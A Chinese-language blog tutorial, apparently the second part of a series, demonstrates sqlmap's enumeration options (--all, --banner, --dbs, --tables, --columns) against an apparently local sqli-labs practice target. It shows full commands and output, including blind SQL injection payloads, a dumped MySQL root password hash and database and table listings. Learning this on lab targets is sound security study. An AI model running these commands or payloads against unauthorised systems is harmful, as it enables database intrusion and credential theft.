佛系阅读sqlmap手册(2)
书接上文,开始
--all 就是ALL啦
适合我这样的菜鸡,漫无目的列出尽可能多的数据,像什么操作系统信息,数据表以及相关内容……
栗子:
R:\deskTop\big_tools\sqlmap>python sqlmap.py -u "http://192.168.147.145:86/Less-9/?id=1" -v 0 --batch --dbms=mysql --all --threads=10
___
__H__
___ ___[']_____ ___ ___ {1.4.4#stable}
|_ -| . [(] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 11:10:34 /2020-04-07/
[11:10:57] [WARNING] time-based comparison requires larger statistical model, please wait............ (done)
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
do you want to (re)try to find proper UNION column types with fuzzy test? [y/N] N
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 109 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 7313=7313 AND 'LQTK'='LQTK
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 4462 FROM (SELECT(SLEEP(5)))YdvY) AND 'ibZI'='ibZI
---
back-end DBMS: MySQL >= 5.0.12
banner: '5.1.73-coyimmunity'
current user: 'root@localhost'
current database: 'security'
hostname: 'WIN-75NA0949GFB'
current user is DBA: True
database management system users [1]:
[*] 'root'@'localhost'
database management system users password hashes:
[*] root [1]:
password hash: *03F903D09840CD883BBE347991DEE2369D291F7D
看到列出了一坨东西,非常的nice,其实东西还不止这么点,还有好多好多,就不全部列出了。
下面的内容给有目的的人
--banner
如果你只想看看banner信息就不要用--all啦,浪费时间,浪费精力
栗子:
R:\deskTop\big_tools\sqlmap>python sqlmap.py -u "http://192.168.147.145:86/Less-9/?id=1" -v 0 --batch --threads=10 --dbms=mysql --banner
___
__H__
___ ___[.]_____ ___ ___ {1.4.4#stable}
|_ -| . [)] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 11:33:08 /2020-04-07/
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 7313=7313 AND 'LQTK'='LQTK
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 4462 FROM (SELECT(SLEEP(5)))YdvY) AND 'ibZI'='ibZI
---
back-end DBMS: MySQL >= 5.0.0
banner: '5.1.73-community'
[*] ending @ 11:33:13 /2020-04-07/
这样的显示是不是看着舒服了不少?
下面满足一下自己的好奇心,人都是对别人的隐私总是充满好奇滴
下面的信息其实 --all 就可以搞定,但还是有有点目的嘛
--current-user 查看当前用户
--current-db 查看当前数据库
--hostname 查看主机名
--is-dba 是不是数据库管理员
--users 查看有哪些用户
--passwords 查看密码
--dbs 查看有什么数据库
栗子:
R:\deskTop\big_tools\sqlmap>python sqlmap.py -u "http://192.168.147.145:86/Less-9/?id=1" -v 0 --batch --threads=10 --dbms=mysql --dbs
___
__H__
___ ___[)]_____ ___ ___ {1.4.4#stable}
|_ -| . [)] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 11:36:29 /2020-04-07/
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 7313=7313 AND 'LQTK'='LQTK
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 4462 FROM (SELECT(SLEEP(5)))YdvY) AND 'ibZI'='ibZI
---
back-end DBMS: MySQL >= 5.0.0
available databases [41]:
[*] `5isns`
[*] `74cms`
[*] `discuz7.2`
[*] `s-cms`
[*] `security`
[*] `tpshop2.0`
[*] bbcbuilder
[*] bees
[*] bwapp
[*] catfish
[*] challenges
[*] cwcms
[*] damicms
[*] dedecmsv57
[*] discuz72
[*] dvwa
[*] ear_app
[*] ectouch
[*] eml
[*] espcms_v6
[*] feifeicms
[*] information_schema
[*] joomla
[*] lfdycms
[*] lvyecms
[*] metinfo
[*] mysql
[*] phpcms2008
[*] pikachu
[*] pkxss
[*] poscms
[*] qibocms
[*] qibocmsv7
[*] qykcms
[*] test
[*] thinkcmf
[*] ucenter
[*] wordpress
[*] zentao
[*] zvuldrill
[*] zzzcms
[*] ending @ 11:47:20 /2020-04-07/
看到有好多数据库,我们这个靶场的数据库是security,下面看看有哪些表
--tables 查看数据表,记得指定数据库哦,怎么指定? -D database_name
栗子:
R:\deskTop\big_tools\sqlmap>python sqlmap.py -u "http://192.168.147.145:86/Less-9/?id=1" -v 0 --batch --threads=10 --dbms=mysql -D security --tables
___
__H__
___ ___[']_____ ___ ___ {1.4.4#stable}
|_ -| . [.] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 11:55:25 /2020-04-07/
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 7313=7313 AND 'LQTK'='LQTK
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 4462 FROM (SELECT(SLEEP(5)))YdvY) AND 'ibZI'='ibZI
---
back-end DBMS: MySQL >= 5.0.0
Database: security
[4 tables]
+----------+
| emails |
| referers |
| uagents |
| users |
+----------+
[*] ending @ 11:56:38 /2020-04-07/
看到跑出来四个表,看看都有那些列
--columns 查看数据列,一样的 -D database_name -T table_name
栗子:
R:\deskTop\big_tools\sqlmap>python sqlmap.py -u "http://192.168.147.145:86/Less-9/?id=1" -v 0 --batch --threads=10 --dbms=mysql -D security -T users --columns
___
__H__
___ ___[)]_____ ___ ___ {1.4.4#stable}
|_ -| . [.] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 11:59:11 /2020-04-07/
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 7313=7313 AND 'LQTK'='LQTK
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 4462 FROM (SELECT(SLEEP(5)))YdvY) AND 'ibZI'='ibZI
---
back-end DBMS: MySQL >= 5.0.0
Database: security
Table: users
[3 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| id | int(3) |
| password | varchar(20) |
| username | varchar(20) |
+----------+-------------+
[*] ending @ 12:01:12 /2020-04-07/
好啦~今天就佛系到这里~